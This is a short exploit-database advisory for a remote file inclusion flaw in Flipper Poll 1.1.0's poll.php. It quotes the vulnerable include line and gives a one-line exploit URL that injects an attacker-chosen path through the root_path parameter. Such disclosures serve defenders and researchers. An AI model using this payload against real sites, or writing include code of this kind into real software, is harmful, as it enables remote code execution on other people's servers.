Flipper Poll 1.1.0 - 'poll.php?root_path' Remote File Inclusion



EKU-ID: 11232 CVE: OSVDB-26503;CVE-2006-3683 OSVDB-ID:
Author: Mehmet Ince Published: 2007-02-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


Flipper Poll v1.1.0 (poll.php) remote file include vuln
---------------------------------------------------------------------------------

Found: Cyber-Security
cyber-security.org

---------------------------------------------------------------------------------

Script Download: http://sourceforge.net/project/showfiles.php?group_id=59828

---------------------------------------------------------------------------------

Vuln Code: include_once($root_path . 'config.php');

---------------------------------------------------------------------------------

Exploit: /poll.php?root_path=evilscripts?

---------------------------------------------------------------------------------

Reference: http://www.cyber-security.org/DataDetayAll.Asp?Data_id=596

---------------------------------------------------------------------------------

# milw0rm.com [2007-02-02]